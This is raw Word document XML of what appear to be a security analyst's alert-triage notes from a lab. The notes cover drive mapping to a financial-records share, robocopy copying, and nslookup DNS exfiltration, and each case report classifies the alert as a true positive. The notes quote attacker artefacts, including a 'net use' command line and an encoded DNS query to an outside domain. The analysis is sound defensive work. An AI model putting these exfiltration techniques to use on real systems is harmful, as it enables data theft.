      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Attacker mapped his drive to the local drive to access financial records of the organization.</w:t>
      </w:r>
      <w:r w:rsidR="008573CD" w:rsidRPr="008573CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC98EFC" wp14:editId="4BFB7605">
            <wp:extent cx="5731510" cy="2430780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="3801711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171178" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2430780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F92E45C" w14:textId="43330E95" w:rsidR="00C86771" w:rsidRDefault="00C86771" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The attacker immediately deletes the drive mapping to cleanup his traces and avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B14025" w14:textId="009E9F14" w:rsidR="00C86771" w:rsidRDefault="00C86771" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">SO THIS IS A TRUE POSITIVE – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF3F2CF" w14:textId="027E777D" w:rsidR="00C86771" w:rsidRDefault="00C86771" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">CASE REPORT – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ACD53C" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Time of activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D0D42" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11/23/2025 06:09:51.349</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347241C4" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>List of Affected Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E51DD2A" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>event.code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E4962" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>host.name: win-3450</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6472061F" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.name: net.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561C515" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.pid: 5784</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D266BC" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.parent.pid: 3728</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC054D" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.parent.name: powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44242DFE" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.command_line: "C:\Windows\system32\net.exe" use Z: \\FILESRV-01\SSF-FinancialRecords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B054D01" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>process.working_directory: C:\Users\michael.ascot\downloads\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567F023" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Reason for Classifying as True Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F744137" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Malicious script was executed on the same endpoint, which mapped a network drive to the local drive and tried to access financial records of the organisation. Drive connections were also promptly deleted which raises suspicion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F68DEE" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Reason for Escalating the Alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFD116" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>User endpoint may be compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF4E294" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Recommended Remediation Actions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A51A57" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Endpoint check,password reset, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F04C88" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>List of Attack Indicators:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4B779" w14:textId="77777777" w:rsidR="00C86771" w:rsidRPr="00C86771" w:rsidRDefault="00C86771" w:rsidP="00C86771">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86771">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Malicious script was executed on the same endpoint, which mapped a network drive to the local drive and tried to access financial records of the organisation. Drive connections were also promptly deleted which raises suspicion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA0B6F" w14:textId="48AB5E96" w:rsidR="00C86771" w:rsidRDefault="00EF7E47" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">NEXT – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F673F16" w14:textId="7110B5E8" w:rsidR="00EF7E47" w:rsidRDefault="00EF7E47" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7E47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="291F7C6B" wp14:editId="20C5A7DD">
            <wp:extent cx="5731510" cy="1913255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10130148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014875" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1913255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="064A6358" w14:textId="77777777" w:rsidR="001811EC" w:rsidRDefault="00EF7E47" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7E47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Exfiltration is the unauthorized transfer of data from a computer or network to an external location, commonly known as data theft. It can also refer to the secretive removal of military personnel from a hostile area. In a cybersecurity context, this process can involve malware, phishing, or exploiting vulnerabilities to steal sensitive information like intellectual property or personal data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2A9D77" w14:textId="48866D61" w:rsidR="001811EC" w:rsidRDefault="001811EC" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001811EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>Robocopy.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="001811EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>robocopy.exe is a command-line utility in Windows for robustly copying files and directories. Also known as "Robust File Copy," it is more powerful than basic commands like COPY or XCOPY and includes features like resuming interrupted transfers, mirroring directories, and copying security permissions. It is built into modern Windows versions and is often used for tasks like backing up large amounts of data.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483C95B" w14:textId="3433F9E4" w:rsidR="001811EC" w:rsidRDefault="001811EC" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>So the execution of a powershell script(which may be PowerView1.ps) is spawning a robocopy process which is copying data into a file named exifiltration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159967C6" w14:textId="477A3697" w:rsidR="001811EC" w:rsidRDefault="001811EC" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Very smart hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CFE69" w14:textId="67B5BF69" w:rsidR="001811EC" w:rsidRDefault="001811EC" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>This was done 3 times :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F80FBB" w14:textId="7808D193" w:rsidR="001811EC" w:rsidRDefault="001811EC" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001811EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="055CDE94" wp14:editId="15963D61">
            <wp:extent cx="5731510" cy="5378450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1616408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6408320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5378450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A03BE2" w14:textId="6F34E1C5" w:rsidR="001811EC" w:rsidRDefault="001811EC" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>So it is a TRUE POSITIVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1037D" w14:textId="50351368" w:rsidR="001811EC" w:rsidRDefault="00CE6146" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">NEXT – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203AE41A" w14:textId="0E66C6E0" w:rsidR="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FCD1FD6" wp14:editId="2844D42E">
            <wp:extent cx="5731510" cy="1748155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="15556348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5634834" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1748155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>nslookup.exe is the genuine executable file for the nslookup command-line utility in </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="00CE6146">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Microsoft Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>, used to query </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00CE6146">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Domain Name System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t> (DNS) servers to resolve domain names to IP addresses and other DNS records. It is a critical component for network troubleshooting and is not a virus, but a legitimate system file that should not be disabled.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4782A819" w14:textId="3F3AD763" w:rsidR="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>MULTIPLE such alerts have come up. But what does it actually mean?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE10324" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attackers are using nslookup.exe as a data exfiltration tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C423F84" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>This is not normal system usage, and the command is extremely suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B70B6" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The string being looked up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546FD414" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6127D490" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>This is not a real hostname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50127539" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The prefix UEsDBBQ... looks like Base64 or ZIP header data, not a domain name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F27EE89" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Attackers sometimes embed file data inside DNS queries to bypass firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6EE03" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>This technique is known as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115C6D3" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>DNS Exfiltration (MITRE: T1048.003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B796F68" w14:textId="77777777" w:rsidR="00CE6146" w:rsidRPr="00CE6146" w:rsidRDefault="00CE6146" w:rsidP="00CE6146">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>also referred to as</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6146">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>DNS Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C7E48" w14:textId="32B23E1A" w:rsidR="00CE6146" w:rsidRDefault="00BB3B2B" w:rsidP="00107FAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">TRUE POSITIVE. CASE REPORT - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576279C2" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Time of activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5ECDA" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11/23/2025 06:11:36.349</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC5E2E" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>List of Affected Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3775F5A2" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>event.code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D2969" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>host.name: win-3450</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680A67A6" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.name: nslookup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72374895" w14:textId="77777777" w:rsidR="00BB3B2B" w:rsidRPr="00BB3B2B" w:rsidRDefault="00BB3B2B" w:rsidP="00BB3B2B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>process.pid: 5520</w:t>
      </w:r>
    </w:p>
